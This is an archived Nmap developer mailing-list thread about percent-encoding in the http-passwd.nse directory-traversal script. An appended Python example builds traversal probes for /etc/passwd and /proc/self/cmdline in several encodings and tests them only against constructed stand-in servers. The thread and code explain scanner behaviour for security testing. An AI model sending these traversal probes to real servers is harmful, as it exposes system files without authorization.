Nmap Development mailing list archives
Re: hexify() problem in http-passwd.nse
From: Joao Correa <joao () livewire com br>
Date: Sun, 31 May 2009 17:49:17 -0300
Thanks a lot Brandon! Your 30-second answer was loud and clear!

On Sun, May 31, 2009 at 5:11 PM, Brandon Enright <bmenrigh () ucsd edu> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Sun, 31 May 2009 16:47:31 -0300 or thereabouts Joao Correa <joao () livewire com br> wrote:

Kris, thanks for your answer and for the reference. My doubt is whether, with the http-passwd.nse script, you are trying to retrieve the passwd file directly, or if it is used to retrieve the file as a parameter for the web application, just as described in [1]. Considering the source code I can only think about the first option, but in this case we run into the problem described in my first e-mail (I've tried to reproduce the scenario here, but the hexed chars were not decoded by the Apache, leading to failure). As mentioned before, when I removed the hexify function and sent the dir function without special encoding, it worked fine. I don't think it is the expected behavior. Since the script dates from 2007 and the mentioned RFC dates from 2005, I don't believe that it is a problem of lost compatibility due to Apache getting fit to the RFC. Have you used the script recently? Which web servers have you tried to exploit?

Thanks a lot,
João Correa

Hey João, sorry that I only have about 30 seconds to reply. The directory traversal script really isn't targeted at mainstream webservers like Apache and IIS. In some really heinous cases I suspect it would work against either, but it works pretty well against all of the hundreds of obscure webservers out there. For example, the ../../../etc/password works against the embedded HTTP server on many HTTP printers. Never mind that it might violate RFC and best practices, it works on lots of servers. We might think of expanding the script beyond just /etc/password though.

I've seen a number of attacks recently that check for directory traversal by going after /proc/self/cmdline, which seems to be more reliable than things like /etc/password.

Brandon

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.11 (GNU/Linux)

iEYEARECAAYFAkoi5JMACgkQqaGPzAsl94ISUwCgvPQ4v+KcjozOTJsOFbF+O/Wx
6b4An3bwsbIZ8VpdbWOvnGl266fteeKY
=OUnF
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://SecLists.Org
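The two points made in the exchange above, that whether a traversal string is percent-encoded or sent raw decides which servers it reaches, and that /proc/self/cmdline gives a crisper signal than a passwd-shaped line, are worked through in the following added example. It is written in Python, not in the Lua of http-passwd.nse, and none of it is the script's own code: hexify() here only mirrors the idea of percent-encoding the traversal string, and the three server functions are constructed stand-ins for the outcomes the thread describes (a server that decodes %XX and then walks "..", one that treats the encoded bytes literally, and one that refuses ".." outright); they make no claim about Apache or any other specific product. The sample file contents are likewise constructed.

```python
"""Traversal probes in several encodings, checked against constructed servers.

Added example for the hexify() thread; not code from http-passwd.nse. The
server functions are stand-ins for the behaviours the thread describes, not
models of any real product.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample file contents served by the stand-in servers.
SAMPLE_PASSWD = b"root:x:0:0:root:/root:/bin/sh\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
SAMPLE_CMDLINE = b"/usr/sbin/httpd\x00-f\x00/etc/httpd.conf\x00"
SAMPLE_INDEX = b"<html><body>printer status: ready</body></html>"

DOCROOT = "/var/www"
FILES = {
    "/etc/passwd": SAMPLE_PASSWD,
    "/proc/self/cmdline": SAMPLE_CMDLINE,
    DOCROOT + "/index.html": SAMPLE_INDEX,
}


def hexify(s: str) -> str:
    """Percent-encode every byte, e.g. '../' -> '%2E%2E%2F' (idea of the NSE helper, not its code)."""
    return "".join("%%%02X" % b for b in s.encode())


def build_probes(target: str, depth: int = 8) -> dict:
    """Request paths for one target file in three encoding variants."""
    rel = "../" * depth + target.lstrip("/")
    return {
        "raw": "/" + rel,
        "hexified": "/" + hexify(rel),
        "dots_encoded": "/" + "%2E%2E/" * depth + target.lstrip("/"),
    }


# One passwd(5) line: seven colon-separated fields with numeric uid and gid.
PASSWD_LINE = re.compile(rb"^[^:\n]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^\n]*$", re.M)


def looks_like_passwd(body: bytes) -> bool:
    return PASSWD_LINE.search(body) is not None


def looks_like_cmdline(body: bytes) -> bool:
    """/proc/self/cmdline is argv joined by NUL with a trailing NUL; an error
    page or a passwd file never has that shape, so it is a sharper oracle."""
    if not body.endswith(b"\x00"):
        return False
    argv = body[:-1].split(b"\x00")
    return bool(argv[0]) and all(all(32 <= c < 127 for c in a) for a in argv)


VALIDATORS = {"/etc/passwd": looks_like_passwd, "/proc/self/cmdline": looks_like_cmdline}


def _serve(fs_path: str):
    body = FILES.get(fs_path)
    return (200, body) if body is not None else (404, b"not found")


def decoding_server(path: str):
    """Decodes %XX, then resolves '..' against the docroot: every variant escapes."""
    return _serve(posixpath.normpath(DOCROOT + unquote(path)))


def nondecoding_server(path: str):
    """Never decodes: '%2E%2E' is just an odd directory name, so only the raw
    '../' form escapes the docroot (the behaviour Joao reports seeing)."""
    return _serve(posixpath.normpath(DOCROOT + path))


def strict_server(path: str):
    """Decodes, then refuses any '..' segment before touching the filesystem."""
    decoded = unquote(path)
    if ".." in decoded.split("/"):
        return (403, b"forbidden")
    return _serve(posixpath.normpath(DOCROOT + decoded))


def scan(server, targets=("/etc/passwd", "/proc/self/cmdline"), depth=8):
    """Send every probe variant to `server` (callable: path -> (status, body))
    and return the sorted (target, variant) pairs whose body validated."""
    hits = []
    for target in targets:
        for variant, path in build_probes(target, depth).items():
            status, body = server(path)
            if status == 200 and VALIDATORS[target](body):
                hits.append((target, variant))
    return sorted(hits)


if __name__ == "__main__":
    for name, srv in (("decoding", decoding_server), ("nondecoding", nondecoding_server),
                      ("strict", strict_server)):
        print(name, scan(srv))
```

Running it shows the raw "../" probe landing on both the decoding and the non-decoding stand-ins while the hexified forms only land on the one that decodes first, which is the asymmetry Joao observed when he removed hexify(); the strict stand-in yields nothing for any encoding. Keeping the validators separate from the probe builder is what lets a scanner add targets such as /proc/self/cmdline without loosening the passwd check.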
Current thread:
- hexify() problem in http-passwd.nse Joao Correa (May 30)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 30)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 30)
- Re: hexify() problem in http-passwd.nse Kris Katterjohn (May 30)
- Message not available
- hexify() problem in http-passwd.nse Joao Correa (May 31)
- Re: hexify() problem in http-passwd.nse Brandon Enright (May 31)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 31)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 30)
- Re: hexify() problem in http-passwd.nse Joao Correa (May 30)